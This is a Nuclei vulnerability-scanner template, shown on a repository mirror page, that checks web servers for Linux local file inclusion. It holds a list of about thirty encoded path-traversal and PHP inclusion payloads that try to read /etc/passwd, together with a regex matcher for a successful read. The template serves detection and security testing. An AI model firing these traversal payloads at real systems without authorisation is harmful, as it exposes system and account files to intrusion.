admin/nuclei-templates
1
0
Fork 0
mirror of https://github.com/projectdiscovery/nuclei-templates.git synced 2026-02-07 03:03:51 +08:00
Code Issues Packages Projects Releases Wiki Activity
Files
231d9a84dfddfd73b293fefa91fa37f59bb129ae
nuclei-templates/http/vulnerabilities/generic/generic-linux-lfi.yaml
ghost e5c3b78a6c chore: sign templates 🤖
2025-07-21 18:24:17 +00:00

80 lines
3.1 KiB
YAML
Raw Blame History

id: generic-linux-lfi
info:
name: Generic Linux - Local File Inclusion
author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
severity: high
description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 33
tags: linux,lfi,generic
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
words:
- "Linux"
- "Ubuntu"
- "CentOS"
- "Apache"
- "nginx"
condition: or
internal: true
- method: GET
- method: GET
path:
- "{{BaseURL}}{{paths}}"
payloads:
paths:
- "/etc/passwd"
- "/..%5cetc/passwd"
- "/..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5cetc/passwd"
- "/static/..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
- "/./../../../../../../../../../../etc/passwd"
- "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
- "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
- "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
- "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
- "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
- "/..///////..////..//////etc/passwd"
- "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
- "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
- "/index.php?page=etc/passwd"
- "/index.php?page=etc/passwd%00"
- "/index.php?page=../../etc/passwd"
- "/index.php?page=....//....//etc/passwd"
- "/../../../../../../../../../etc/passwd"
stop-at-first-match: true
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
# digest: 4a0a00473045022100b6555f84bb9c3de9fdfcb8005142f2a60aee6fb80f447d35eb42fb3adf8e95f1022031a89371251047fb99bf52f5188b22b070cb68b5591852589aba71f1b334427d:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink